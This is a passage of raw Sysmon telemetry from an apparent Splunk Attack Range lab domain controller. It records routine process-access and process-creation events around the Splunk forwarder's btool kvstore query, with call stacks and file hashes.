ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647E-6064-4A00-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4A00-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000002269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4A00-00000000AE01}2612C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-647E-6064-4900-00000000AE01}30882768C:\Windows\system32\cmd.exe{266CAFBE-647E-6064-4A00-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.973{266CAFBE-647E-6064-4A00-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647E-6064-4900-00000000AE01}3088C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000002258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4900-00000000AE01}3088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.960{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4900-00000000AE01}3088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-647E-6064-3F00-00000000AE01}38403844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-647E-6064-4900-00000000AE01}3088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.967{266CAFBE-647E-6064-4900-00000000AE01}3088C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program 
